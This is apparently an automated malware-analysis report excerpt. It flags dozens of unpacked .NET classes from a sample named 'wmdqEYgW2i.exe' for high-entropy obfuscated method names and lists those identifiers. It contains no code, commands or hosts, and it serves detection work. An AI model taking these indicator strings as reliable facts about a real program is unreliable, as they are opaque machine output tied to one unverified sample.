Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, rIKPuHLR4LueBjO981D.cs	High entropy of concatenated method names: 'G1gLq5ZhOR', 'eddLgLkex0', 'hOPLjjG9V6', 'sr8adiHFku5nHuTZPob7', 'hUWQwdHFKFkMmFlx2hfs', 'XMFjSGHFyoKtQ9K8rZOr', 'seHCJ5HFCsqD4kvnHZnd', 'BPHhX6HFGvwIDs5ssaWE', 'mhqqqfHFPfckkb4bNBAV', 'F1ipt5HFXonmvJXLUCcC'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, Kt11kWQ1dPLgCREHBEB.cs	High entropy of concatenated method names: 'E6DQMADBuH', 'hMYQDG8ZEb', 'W4ZQmKaPQh', 'PprnYUHEQYvDVSAgbGrc', 'NMsUOeHEIqkrZNwd16LU', 'jwajGeHEeLLuKwxnwQSU', 'fYTIVvHESefXRUWN7Ooa', 'v9CnwAHEYaamFV5UD3R0', 'TFkAPFHEZhluwnmvC4mS', 'bH3dgXHE7rqLy215SdNE'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, psy1bBIZElcggbr41E5.cs	High entropy of concatenated method names: 'method_0', 'qJfIfvOqTl', 'PNHIFLR4tF', 'ltPIvVLGu4', 'p4YIoRupJl', 'gkQIAkZKIj', 'gVBInWugUs', 'nTGdtMH1qjFt1I8BXTdi', 'h6CSkRH1RIryE033tECy', 'm6FsEbH1llaBFd1EJq0B'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, YHuhCiNHMNDYMeQoCCZ.cs	High entropy of concatenated method names: 'q68NxmQWOg', 'DdMNppL4e4', 'TT6NabDwOH', 'lJtw4YHfpw1Z3xOSL6WL', 'vv73NRHf2ZdGZhbPGjq9', 'Pub81wHfxecw9tOJIjQr', 'BZXoyqHfaCWwQJLNLTrl', 'NpvUqCHfUv5oIJaL1sIn', 'JxMksaHfN2EtMZTIKJAA', 'Hry4sAHfLaL3Voy3UYhC'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, ynpGilbj8SbgalVBhPU.cs	High entropy of concatenated method names: 'XG22aoS2MnA', 'Kwq2aASGcpx', 'SIpH72HbnvXmaVRiYPcY', 'ljpbToHb4NP8mrClq9tk', 'tdhoEsHbVJ1qdPOxQxfx', 'wBXf35Hb5NWOtgfTouJM', 'TWtUKHHbdhmdB73saj7S'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, juNZZxQcFPpOBx5B0U2.cs	High entropy of concatenated method names: 'e39QsYM76k', 'JhPQtaTrcB', 'aXwQuxRW27', 'K42QitCiuf', 'qZ5QbNo626', 'gRZ5jIHEormgKKXL5UlZ', 'rEpyYGHEFJ9FZdShLLfK', 'uiUR1NHEvagixTkfCFnw', 'zodRiXHEAwn5Lm8ofNgg', 'svrFpDHEnOLtxhBV1rNW'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, i2sOyqYp2qn1NJDci8x.cs	High entropy of concatenated method names: 'RBZYUQdSxM', 'HqxYN6DqAE', 'kZQYLAZrsG', 'method_0', 'method_1', 'Fc2', 'method_2', 'method_3', 'DB1', 'YHLY8Jc9xc'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, ewrnHVz2Em3gnCIihE.cs	High entropy of concatenated method names: 'gbwHHMfCuX', 'mmJHxAoWHD', 'kg0HpeXjvb', 'kMCHafAtFS', 'zktHU38GQD', 'ea8HNUNyWr', 'Ak9H83bKBS', 'VBYZs3HeaAvcBBBkG3wt', 'TnI1g8HeUcyihRdaGVkR', 'F2f4PXHeNtumTsjkfWgq'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, HFBlwGp78PJYe8NpwYr.cs	High entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'KyvHLp4ZGvQ', 'vTDHpHK1kwq', 'dXAx5wHYQ7VnG1Z9jyGf', 'msUsbFHYS22ls24QO9d8', 'DdxRpdHYYP0bPiQDlFqG', 'eatr0cHYZvi9Iql82bXD', 'Y0QoEhHY7jUoqS3CFi4I'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, FjMrhDaJ76Hv2OSGsdQ.cs	High entropy of concatenated method names: 'wE2aDjqaRg', 'HX6NnxHZb87PYH0lJ8UW', 'OHWVWyHZusP7Wh63NLQK', 'Yx09BiHZivi2jfIUmAfn', 'oRGmTkHZw9IiylGDmIRB', 'e031dmHZz643t9ki9bqw', 'U1J', 'P9X', 'QInHpBAOZGN', 'YNyHpr8VFE7'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, jyV9ajnZDpTImApmy8G.cs	High entropy of concatenated method names: 'FgonfKL5CH', 'PlDnFchU0R', 'vOZnvVO11S', 'WHXnoCAs9j', 'J9VnAAUHaw', 'HHRnn0JLD6', 'Ffnn4xL8Yg', 'lYJnVXjjpS', 'lnMn5EDcCG', 'XaRndG3TGd'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, ExmtqdxIe3trnYjckgJ.cs	High entropy of concatenated method names: 'dCfxd8XNNB', 'TrexJDDwui', 'Oxax3NZ3w2', 'kfoPVbHS4DEZGYrXy4Ii', 'qTqOhIHSVBuux88GH3rR', 'GvYku7HSAuIPfGcYK7Fh', 'KCB0r0HSnVWDZHX8PyIN', 'uS5xQ9QBZc', 'fZExSlpVde', 'PN0xYoJQpA'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, VtM5fEovIO5FhpxvvtY.cs	High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'Pib0UdHcIqUWes9IOD87', 'lre4OKHcXa9f1ehGgg1Y', 'V27cbOHc6NCD3KgE09l1'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, WrEdB0Hh0mgm5vA1gfn.cs	High entropy of concatenated method names: 'P9X', 'ambHt2UtQZ', 'FEnHLOeH1Ns', 'imethod_0', 'FYLHu96oXW', 'VE5alqHehpAt58uhPSru', 'uA3Zn0HesYqpm1qDBL6x', 'DX4jMgHe0qaViE1KSIqr', 'J43DoSHecaVYgFKsMgyf', 'Cu45U0HetPm83wAebH7a'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, THiFlrex5FivfVbfQ2s.cs	High entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'cIyeaORS2m', 'Write', 'PEReUXTDVg', 'HwweNsOC7k', 'Flush', 'vl7'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, AKuTZRp4sx2WKlvYFL0.cs	High entropy of concatenated method names: 'PeepbDH6I6', 'lAwQudHYioARjQE8ji7T', 'k4v1eOHYbpjPT7wR9mmi', 'aRNLkYHYwCEbBUb8ZNWL', 'rrwsr4HZ2piaWQPkJUQo', 'wH43QfHZO02noRJEo5Si', 'fdZijuHZHW7BcZ5A6bRx', 'e4WtAIHZxQ9NtvNfqZpZ', 'drOaU3FXAn', 'OSGKt7HZNUfgVctYGiWP'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, X9BkVw8jYfypxoBhWxK.cs	High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'x02iWeHvFwZ0LjkQ4gDV', 'w4cKq5Hvvllp0omyoW5J', 'od9R3XHvoKSJYP9J5C3E', 'dYgwpTHvAe3H1lSBV3Ku'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, HWVmrJe5Cdq8lABRiBy.cs	High entropy of concatenated method names: 'xoGeb4E66M', 'USyez0dw4I', 'k24eJZRrPb', 'l5Me3fOwRh', 'fKoe1CZZKB', 'kVueErv8SW', 'CCqeMdfLiW', 'E9LeDHMcbO', 'u5PemWdIbe', 'vHpe0kL6Fj'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, TAfmZrN8w44YmFBSh3n.cs	High entropy of concatenated method names: 'H2pNl2rSXs', 'TsmNqy2suw', 'JkJRRGHfjZdtRdgKj8e4', 'Exkcg1Hfqi2ClrTDqKKS', 'cfjH6MHfg82cJ0WXYU3n', 'lZmQc4HfWTPLQlVWkkM2', 'RaHLUVHfBx3WGaVS8E04', 'jtD118HfrDsdlwfmVn9x', 'wVwBiiHf9X5eXglgRWBh', 'nywOrOHfTyZAHFbt4JtL'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, rhgJVaU5LGTbwTxaBJ1.cs	High entropy of concatenated method names: 'kOEUtZ936x', 'brcUusuQWP', 'p6iUix1afI', 'JisCEPH7zcQma5QOYbsE', 'ONRBSbH7b64dKlbXAtay', 'B81exmH7w4WqTlujrf3B', 'IruO80HfOJT55l307kR6', 'kYWUJj89o4', 'gwLU3YXV06', 'Q7GU1GtxFe'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, FX1ASkUFmgmNaYJr3gw.cs	High entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'xuAHLR5BRnd', 'vTDHpHK1kwq', 'NH7k4HH7vRB3PCLHj18Z', 'WGr8oFH7oldcW4U2uCrS', 'KRFJpZH7A2vQOwgCy09o'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, CIkHNUCDJFIEvgYS44O.cs	High entropy of concatenated method names: 'KDWHLr7OYks', 'FmoC0RDhYc', 'sXoHL92D7h6', 'kJEtceH5eDDco2REcYE6', 'C9rJjSH56KQHRhKyAGqX', 'qsMYcOH5IXDf1bXai3sh', 'zYoskAH5Q7wJnxMjCZmk', 'elQTHcH5SJJub3D91iEw', 'JjvMlpH5Ym9P6NQEMn4H', 'Elw82qH5ZRfSyvwuq9SB'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, zLGDoan3hJoAVAlt9jr.cs	High entropy of concatenated method names: 'GhGHLX6rga6', 'CtmnEWJENT', 'MpVnMN1r9c', 'Q6wnD2NPma', 'yCwhJNHhXdGDubBFREwu', 'cu1XTAHh62CSocs5WdI5', 'u546SNHhIhYujNLq7cjv', 'iQlmJJHhel9GZ2liO8YF', 'DvUv2CHhQxhoNklSWtfL', 'NfaiKGHhSKZY2fonWCEP'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, hPhnv78PegBjIQt0fmi.cs	High entropy of concatenated method names: 'VHHstuHAAyxn4qrIEHGe', 'nxVMjvHAvIZIoRp8DgH9', 'b0wVT4HAoA0YPGYudr6P', 'kAHnw0HAnaKCJwK26d6U', 'Tqdjw4GILe', 'cWj8d7HAdhixjM4T5U6Z', 'OQGmCCHAV3ZPrxeExyHZ', 'FjOr5kHA58aga4yUcPio', 'lXmj2MHAJyNNgLJ26QoU', 'T31DTmHA3bUoWbDIkRvE'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, i76fD4JSoQgA41G4eD.cs	High entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'Psd1kO4U3'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, UH8Njf2Zcu37XU2VCp7.cs	High entropy of concatenated method names: 'kVw25WBRrD', 'zvh2d4fZGm', 'xdvTY5HQ73qxGKQ7VHd5', 'fwDUpYHQYI6Wd5pto0rT', 'lvUbOsHQZgxP20CI0xfR', 'WEf2ECTQtg', 'PGiSc6HQoqT84b4ueUXL', 'rw4N2wHQF2rKlW0l3k6S', 'I7mk3nHQvV948cY7oQ8m', 'gZFFZGHQAHWlXsLPvqd6'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, NTC0pttg1HTIU4MADSr.cs	High entropy of concatenated method names: 'g7FtBe29N1', 'RGZty8Lga7', 'P8jtK4VopL', 'z2xtG8RrKO', 'AHWtPTs1gj', 'DUJtX6ebtS', 'gF8t6hoVoE', 'U22tI7Icyx', 'Dispose', 'A4DQM1HilpXNhT4hu5Q1'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, OoXUWjFAigHsfr4KHOT.cs	High entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'qEUF4pLrkN', 'n2oFViATUy', 'a3jF5BdNrD', 's6lFd4KrvL', 'miVFJ1j3kD', 'QtpF3MVbVT', 'IjXulRH05kd6OdFBCPNl'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, j2DDjw4Z2yOo2LE8QoW.cs	High entropy of concatenated method names: 'OLO4fb5vFI', 'lSi4FVpZlQ', 'JRM4vKYPNk', 'beS4oCA0k2', 'g5t4AbEufQ', 'EUa4nhBqFd', 'V4i44uMK1J', 'eEX4VE7CcS', 'i0045ZfFv9', 'jQh4d0hx5m'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, MQd9yfP0Vqn0hVB1n6F.cs	High entropy of concatenated method names: 'HbXPhwnLAy', 'L35PsG7PLg', 'SW8PtpHUiZ', 'qgqPuilW3A', 'O6pPinXeDM', 'AedOo4HJ5O6hAWklxH3m', 'J35UtyHJ4ft4qNv6jjLN', 'CxBd8uHJVZbW7X58UEJB', 'xedAhTHJdpMOVmDLvNED', 'HhhZtZHJJfNtGR80RY6C'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, VG5T9Va4AuW3xal8oFH.cs	High entropy of concatenated method names: 'q64', 'P9X', 'rUIHpjWPj25', 'vmethod_0', 'vOIHLUwjAT7', 'imethod_0', 'BiO6ROHZ3D3nHC8aJaRf', 'jZuSJaHZ1o5GStwyTTO4', 'zX4FWVHZEg9RXlTYqw0w', 'cSf1EjHZM4pcpWwIKOBQ'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, rrp7LICnCChcdkPPfCl.cs	High entropy of concatenated method names: 'N2N', 'MBSHLWOmN8Y', 'xAoCVApSNv', 'aweHLBPb43n', 'tAaT03H5WKl8LfhMWuuo', 'vgGFLeH5Bw5FSNTvWakv', 'JWgQEwH5gXIJy72ntPQq', 'cbscQ5H5jSkm956jSBWX', 'rEAaKlH5roeoAAS83HJi', 'vaSfakH59QnJT092RyIM'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, a7bpikNgn4Nbf8Mg26Q.cs	High entropy of concatenated method names: 'P9X', 'nfRHpGVTK9M', 'vmethod_0', 'imethod_0', 'PGZxWeHfGdujLNOKSDq3', 'SuApa9Hfkkk0f3v6Nlqq', 'tNojCBHfK5Y7sTZX0LlA', 'EtksnwHfPJH6IrwAwPWr', 'So2NxYHfX5ORWY5M7wlx', 'Q5ZtIlHf6ny42tu5cAJt'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, OCqjyLL15C4FV1MGkXe.cs	High entropy of concatenated method names: 'x1BLt8y3D9', 'eFOjjLHv84huHRJYuekl', 'QwxwfYHvRyoq5a15QQcg', 'n4YsgrHvlRbCDfJ2kSyJ', 'MepaNQHvqx6quDFO8DWN', 'P9X', 'vmethod_0', 'QR8HpekUjrR', 'imethod_0', 'QQEaBUHvN1PGDxq12W1L'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, vfsct6p63j9aKc4jDs8.cs	High entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'UxLHLxvSTDa', 'vTDHpHK1kwq', 'CPrF4lHYyTIXlWN6QC71', 'WMuBJxHYCFUUQvv5KS0c', 'zI3QILHYkH3CN3m4MAGk'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, rHNSY6LrEFiBsDXdG6M.cs	High entropy of concatenated method names: 'CLRLCqNDni', 'xN0dkIHFvRSZIUZ4nPwr', 'SeKB1kHFf3qWoVLo6Qen', 'cS2hriHFFOhZZqZimbgX', 'vTcSF0HFo7otJop9DLR5', 'GtlLTb3SHh', 'VSsOgwHFQjPMJgQ7A8ju', 'hjJpWUHFSdoLUXTWpmHE', 'luUoILHFYcIqSuqoq9Ex', 'MM5P4SHFITnISA0toPuy'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, QZjQAHHIWZrHZg7HbA2.cs	High entropy of concatenated method names: 'Co7', 'd2B', 'hGPHQtJVo0', 'LugU7BHeY3NVO9onAuly', 'RagXfZHeQNUIiTXsaWmR', 'n3YMwuHeS5wVPjQ8DKfp', 'Vc7iXAHeZdB6OsrhqK55'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, luFxxouOH7bhXISKGqP.cs	High entropy of concatenated method names: 'zrfupTdJUi', 'CKsuac6C8N', 'IAxss1Hi1CvBSyn931rs', 'SCdBckHiEUvC6rrMhIU9', 'CRmxjiHiM9SskcluZhh0', 'gHMSZBHiDYDjmLANIrPC', 'M8dBRgHimLkVEfTehLkF', 'QBhu2onSPi', 'Ei6MARHi5AnhPG9cQ2qe', 'XTeOE7HidwvAKpVJ7ptp'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, L6outxhIpKyrDwnFJAa.cs	High entropy of concatenated method names: 'lrQHL6Cb3BX', 'CJMHUkO9Qgq', 'yQ8', 'K9m', 'nOr32cHtvYMdjteiKiyp', 'Pl15BGHtfsCqcfN7s8WZ', 'AwvQcTHtFJ7w7gN0a50b', 'QIJtrSHtoNgGVdlH8bNV'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, YCf6gg2aqBfu5yuM2Wg.cs	High entropy of concatenated method names: 'Fw72NLFrmp', 'Pgq2LpL45k', 'KJ028WaqKX', 'OF12RVtaEW', 'YPDCZeHQRKiZWPKbKoBI', 'QUV1vPHQLQMSN2jPtiAu', 'kLM1uXHQ8BBibnf0cHYT', 'vvQlqMHQlLtePqgDkB6x', 'P82i3eHQqAuc3CLIdGVB', 'BB6NZYHQgGybcyrnSDQx'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, fAIFZLWlSJKNXGw9YVs.cs	High entropy of concatenated method names: 'Dispose', 'LPmWgkKJEU', 'NSiWjnHatB', 'wIxWW7Nx8b', 'fAe9L9HAzcLfF24ltKZG', 'vGSAYdHnOBv12VAFAPtA', 'zlxg9UHnHE25UuCu9y2a', 'cQbgn1Hn2lFy2Bwb6HEU', 'Dcm6a6HnxXfiWIthgSRE', 'a2HAfWHnp7FHe4RTmNaA'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, Sd7wP97kJrXCDUD7TlA.cs	High entropy of concatenated method names: 'O9hfj2yxMg', 'SvjSokHm3DTO1ZgPbdK9', 'u8Gkp5Hmdkj3efjSabUx', 'xRaa4mHmJt6GewIkgvuj', 'WBfQBEHm1b7IXfdYtbEg', 'kt5', 'XKy7GuAikI', 'ReadByte', 'get_CanRead', 'get_CanSeek'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, CxppKd82fbVVXGf7SSj.cs	High entropy of concatenated method names: 'UUC8pYYNSi', 'JA08ac2Us8', 'Luq8Ugf0Cs', 'kjY8NChZA9', 'wHW8L8A6FS', 'YA688tc7oG', 'S7g8RFXurq', 'nKt8lirtTC', 'P7V8qsqOAu', 'Pyg8gk5k3q'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, kb5TGGyhLi4cShaNPDw.cs	High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'BnRHLg7TqlA', 'MKvHp1Ela91', 'PGVxXlHVKqbDFAccfiJQ', 'GKSLIaHVGuL5WCbLyBLG', 'C7TsQhHVPt8wGdqpyHXM', 'SUb7U1HVXgIEiBjkNSIR', 'DijIniHV6Yh9uu4Kawp8'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, MQj1Y4tZQkf5RS7q5al.cs	High entropy of concatenated method names: 'fGLtfQWEyR', 'TWytFSUIFW', 'KEOtv1Hos0', 'nUjtoc6uNf', 'Dispose', 'NqyeWeHirkZGPunHuKZx', 'AwwfBJHi9UOH9Dc3e4Pg', 'Ld1rNJHiTvuLwi8c20uX', 'wuLfFKHiykmUMYwbIjGf', 'z059GiHiCasHxKO6EvDV'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, YMqXwbn8pdY2u3Prlq1.cs	High entropy of concatenated method names: 'rbenXjZTLa', 'sLrperHhgdOgOrNSq1cJ', 'QvOvxxHhl2HvK552EeP2', 'arUijwHhqQNa9k5nBt1M', 'KIoXI7Hhjp9Sd3gbMCxB', 'HesChHHhWdWG719MaIA0', 'IPy', 'method_0', 'method_1', 'method_2'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, jjVKU4Qw3bDwwV7jJhX.cs	High entropy of concatenated method names: 'QWBSOQl7p6', 'TD2SHOuTTg', 'gSuS2pL5RJ', 'qS6Sx118FC', 'qwaSpVjj4q', 'Cd8SayUh8g', 'PpBeI4HE313w1vCNZdU4', 'ER4439HEdCN0H1id6uXM', 'JrAMG5HEJ6MWjc81KZnt', 'eI1bXxHE1J0kX0HU9aJn'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, Ef2AOyCjCFD34WWvJG9.cs	High entropy of concatenated method names: 'ci2CCw2Tpa', 'PWZm87HVhJPP6XLYEuOa', 'VaTHyRHVsWqy2w69Y8mv', 't1lgLRHV0JnKQfV7J7BS', 'ClpIbiHVcMmUjyiK7iQU', 'WKNydXHVtKGLeqeVfRVZ', 'GSGCBJhfcU', 'fr2M4jHVE6sWrIhOY9vm', 'fIY5v9HV3rMARSBlmPCJ', 'FgFTEnHV1mMwcI40rxOu'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, N7i0OyUXuB4Cu3kEAk4.cs	High entropy of concatenated method names: 'MUtUZLbc9D', 'JY3Tg9H7fejRJq5FM0Yu', 'RAsBsXH7Z1W97Ce7RU2X', 'LcKrerH77BddvvtSvhJI', 'E94', 'P9X', 'vmethod_0', 'L41HpCrKcnF', 'kD6HL8KmJD5', 'imethod_0'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, r1rL5kbTn3F82TuxB81.cs	High entropy of concatenated method names: 'gDQbSVgg4L', 'rZubYWvxTp', 'u7AbZlyjJB', 'T3Db7f0kWU', 'WWbbfhWSVK', 'GiibFQkAcp', 'ECJbvAVMDX', 'sW2bo4sNBj', 'RShbAL0l8Z', 's2mbnH4fWt'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, tHsdWQa8DdENaUjHo25.cs	High entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'VZFHLaLJuXR', 'vTDHpHK1kwq', 'uYkhK5HZlVQd9XKMrhdj', 'MFQjf3HZqT3pYVPTMi4f', 'vFCdG1HZgARlSwDeIZyQ', 'ClBYqkHZjq8T0JEBY7hK'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, UyiZJVSZPQKpxb1iEE6.cs	High entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, m89FWlKgqYTtySSY3wX.cs	High entropy of concatenated method names: 'yXjPH2VV7j', 's5psRMHJCe6TDQLt6n0V', 'dkiYNwHJTNqOKoiVCCNK', 'QRGCP3HJyN6NRuHfIJm0', 'YPU3CwHJkKeGDPMPsXRJ', 'dubKWVlW32', 'vYWKBHZLl9', 'VwLKrmZe61', 'drAK9QcqGs', 'CyVKTx18Q2'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, XEYIAVfmyukLPf2hfMN.cs	High entropy of concatenated method names: 'stUfc8UrVD', 'k6r', 'ueK', 'QH3', 'y3pfhAZIVc', 'Flush', 'yOCfsJrH29', 'k0yfthGPFa', 'Write', 'qxrfuYBWsi'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, yro7gXaBYDHX29h0VYW.cs	High entropy of concatenated method names: 'qc7aeopRZC', 'DSsaQu6GcU', 'NNnaSYTO32', 'z7uoEyHZFs5dpYLXUQgy', 'eihpngHZvQOAHpnAgZyM', 'tPeXfqHZ7kjC7C1fV96E', 'WhfH5EHZfe3KeC9QMNeY', 'sQIaPSjImZ', 'cxgaXfImpW', 'YvNjmAHZSEw8npaXwf1U'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, wVJdFuYwN8WsM28SGx7.cs	High entropy of concatenated method names: 'nykZOJKM4l', 'qZJZHmIR50', 'Yd7', 'qXbZ2k6NCj', 'if5Zx3DFTI', 'uW2ZpG09g1', 'q1lZaEya1V', 'BfcRE1HD0fGGgZpj11Bg', 's8g4TSHDDUD2wZyoYrOY', 'cnNOr1HDmPEHMY1oRopq'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, hYBLI52mxbyWG0Fkc2U.cs	High entropy of concatenated method names: 'uJAxNemH0W', 'JZEvZfHQcGUcET6dlgg3', 'aExosfHQhAU8aMiE7Ecp', 'IfrdDlHQs8rQsqBveZIg', 'BoQA80HQmWCn5iLOI96A', 'lpayHHHQ0GyNaXTwINxH', 'gI9R6JHQtVi126w4PdAr', 'cWTxO1FTIs', 'W0Nx2wjlnN', 'xepxxuKtUx'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, KegdKZPRnHmlN2Y8dwK.cs	High entropy of concatenated method names: 'MoQPZZWkUJ', 'AyNPq2Y9aq', 'mMHPgXEMrG', 'O02Pj7HGsP', 'C5yPWGchQk', 'CpvPBsIfUH', 'Bx3PrL1yBq', 'N8rP9LkKgI', 'alyPTlL4Um', 'SrjPyCmNDZ'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, NCqEMFZL7ttKE6n1Uki.cs	High entropy of concatenated method names: 'l9gZRAoRxf', 'gfvZluhIJG', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'hm3Zq2W4o8', 'method_2', 'uc7'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, C7aSrlSVN3Omp1Amp6c.cs	High entropy of concatenated method names: 'HKVSdLJn0a', 't9wSJ9mLJs', 'WwXS3ocIro', 'XMUS1ouS6n', 'k11SEW5Acw', 'r0ISMyNlnN', 'i2NSDEM7GO', 'ftVSm5jVPw', 'h0rS0e2fCH', 'z4BScNbUu7'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, Qix8payQA0jPRrO1Y8p.cs	High entropy of concatenated method names: 'KDOyouqBf3', 'EDOfF7HVafdwsbPNYeKn', 'VQo5dqHVx8Twf04mmbya', 'XDG6KHHVprN9iROpacl6', 'HE5XS5HVU9TihJsOkwSk', 'PQsyY9EyhO', 'TjIyZyKAeC', 'BGSy7cTyyt', 'LK5jibHVOMfVRuwWv6YP', 'PpSCZQH4wVZGUxAvIahu'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, BIRNaXa0pyS2JCWQFit.cs	High entropy of concatenated method names: 'dDtaiIClkt', 'g6WabSas2X', 'Smjawc1Whw', 'H5oazOtsUF', 'qlNUONwePu', 'mvRUHRvwDZ', 'TnWU2w6XNB', 'i7U33xH78ODqr8nZ1CQF', 'Ut5OvcH7N7Ve8nwIq4wf', 'Ld3mk0H7LcY5Nkh9ZIe1'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, Dh33T9VvLYLf94UQ9AR.cs	High entropy of concatenated method names: 'hEEZ7cHsDhwaM3InhLfR', 'ih0ZXiHsmceCEIAgqLdW', 'miD25uHsE914Ccdg1Yy8', 'HKiMytHsM44Xs0sG6Sv3', 'SyHGiXHsJeUpIk2P0SxQ', 'MrGFc2Hs3RP6Qc9KDqq6', 'P9KoenHs597UkmnXqoFr', 'kBBm40Hsdx6GljU7W5sg'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, rdBYACY335wpLuOuTFx.cs	High entropy of concatenated method names: 'bjtYEH9J0I', 'C0TYM4gBat', 'GTJYDQk5xH', 'CULYmCSD9M', 'l6XY0Fbnqw', 'S5Bn8gHDoWvO140KHYt3', 'mAKTj0HDAufiP8pbtEt2', 'vLis0eHDnVII3oHhBLcY', 'sw5rCOHDFovdeI5PDwRX', 'AARBkBHDvxyu31b0W9WO'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, YPWYI9HwsJEINU58jeM.cs	High entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'WkvHLHoFIq8', 'vTDHpHK1kwq', 't6RlXkHewdAf36uMPyWK', 'Yi9OAyHezsn7Xtc3vgvp', 'cLtImqHQOF4GOZOT6ym6', 'zWvvdgHQHk5HiXEhhl5W'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, EPMspVynH2B4gDu0Umb.cs	High entropy of concatenated method names: 'W3Fy1darGk', 'SnGyEg4Xwc', 'jYCyMG5Q7I', 'oo9bkIHVWqk3qaMAKPfE', 'DZBgS7HVBpuVsnZSmjEU', 'wRHFclHVgVKxkbM0Wgiy', 'BeUiwlHVjqYvPJYHbZnc', 'xKWyVTjMhS', 'Wv2y5XFJIK', 'cEwydt1XDa'
